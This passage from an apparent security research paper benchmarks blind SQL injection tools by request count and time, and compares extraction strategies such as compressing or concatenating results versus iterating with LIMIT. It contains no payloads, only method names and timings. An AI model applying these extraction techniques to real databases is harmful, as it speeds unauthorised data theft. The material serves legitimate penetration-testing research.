3. Comparison between all the methods A case-study has been made to compare the efficiency of the different methods covered in this paper. These tests were run in a local LAMP environment with an 8 × Intel® Core™ i5-1035G1 CPU @ 1.00GHz Do notice that sqlmap has been compiled which makes the execution time much faster. We're comparing the results against a not-compiled script. 3.1. Hexadecimal Strings Test-case: 10 32-bit MD5 hashed passwords Length: 320 bytes Method Total requests Time Requests per character ------------------------------------------------------------------------------ Bisection (sqlmap) ? 4 seconds 7 sql-anding 2,652 4 seconds 8 pos2bin 1,900 5 seconds 5.9 Duality 2,616 8 seconds 5.6 Lightspeed 1008 2 seconds 3.2 3.2. First 50 table names Test-case: table_name from information_schema.tables limit 50 Method Total requests Time --------------------------------------------------- sql-anding 6,300 10 seconds Duality 6,090 36 seconds Lightspeed 2,401 5 seconds 4. Extraction Strategies 4.1. Comparison between compressed string lengths To further accelerate the data extraction process, the built-in compress() function can be used. The following table shows the corresponding lengths of group concatenated strings and their respective compressed lengths. Query Length compress() ----------------------------------------------------------------- group_concat(table_name) 1024 440 json_arrayagg(table_name) 1316 447 group_concat(column_name) 1024 458 json_arrayagg(column_name) 56897 8313 4.2. Comparison between group extraction or one-by-one extraction The functions group_concat() or json_arrayagg() can be used to concatenate the whole result of the query into a single string. In contrast, if LIMIT is used only one item will be retrieved for each request and the index for the LIMIT clause would have to be incremented until the whole items are iterated. The disadvantage over group_conat or json_arrayagg() is that for each request the DBMS will have to do a huge concatenation which uses a considerable execution time. For this reason, a case-study was made to see if using a string concatenation function is faster than iterating through all the elements using LIMIT. The results are in Table 3. Method Total time ----------------------------------- group_concat() 15 sec LIMIT n,1 13 sec 5. Conclusions The most popular attack vector for Blind SQL Injections in actual times (July 20th, 2023) can be improved and optimized in different ways to perform data extraction in faster intervals of time. The best tool to use depends on the nature of the injection. Do have in mind that sqlmap has been compiled which speeds-up the program drastically. It is yet to be seen how the other tools compare against it once they're compiled as well. 7. References [1] https://github.com/sqlmapproject/sqlmap/wiki/Techniques [2] https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf [3] https://enderspub.kubertu.com/blind-mysql-injection-using-bit-shifting [4] https://stealingthe.network/efficient-time-based-blind-sql-injection-using-mysql-bit-functions-and-operators/ [5] https://ajxchapman.github.io/security/2017/01/14/blind-sql-injection.html [6] http://blog.k3170makan.com/2012/01/bit-shifting-blind-injection-simplified.html [7] https://youtu.be/HMzq_KoTFxU [8] https://owasp.org/www-community/attacks/Blind_SQL_Injection [9] https://youtu.be/_hvv5OBWed4 [10]https://www.websec.ca/publication/Blog/solutions-challenge-2B Author ------ Ruben Ventura got involved in the field of hacking and info-sec around 20 years ago. He has worked performing pen-tests and security assessments for many international firms, governments and law-enforcement agencies from all around the world (also a bank). He has been presented as a speaker and trainer at many different conferences, such as OWASP Global AppSec USA 2020, HackFest Quebec and Bsides Philly. His interests include hacking, neuropharmacology, meditation, music production, theoretical physics, psychology, lifting weights and coffee. http://nzt-48.org @tr3w_